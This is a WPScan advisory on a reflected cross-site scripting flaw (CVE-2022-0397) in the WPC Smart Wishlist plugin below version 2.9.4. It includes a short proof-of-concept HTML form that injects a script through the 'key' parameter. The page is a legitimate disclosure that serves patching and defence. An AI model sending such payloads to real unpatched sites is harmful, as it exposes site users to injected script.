WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

WPC Smart Wishlist for WooCommerce < 2.9.4 - Reflected Cross-Site Scripting

Description

The plugin does not sanitise and escape the key parameter before outputting it back in the wishlist_quickview AJAX action's response (available to any authenticated user), leading to a Reflected Cross-Site Scripting

Proof of Concept

<html>
    <form action="https://example.com/wp-admin/admin-ajax.php?action=wishlist_quickview" method="POST">
        <input type="text" name="key" value='<script>alert(/XSS/);</script>'>
        <input type="submit" value="Send">
    </form>
</html>

The source and destination should use the https:// protocol for the exploit to work on Chrome.

Affects Plugins

woo-smart-wishlist
Fixed in version 2.9.4

References

CVE
CVE-2022-0397

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website
https://kazet.cc/
Verified

Yes

WPVDB ID
c8091254-1ced-4363-ab7f-5b880447713d

Timeline

Publicly Published

2022-03-01 (about 7 months ago)

Added

2022-03-01 (about 7 months ago)

Last Updated

2022-04-08 (about 5 months ago)

Our Other Services

WPScan WordPress Security Plugin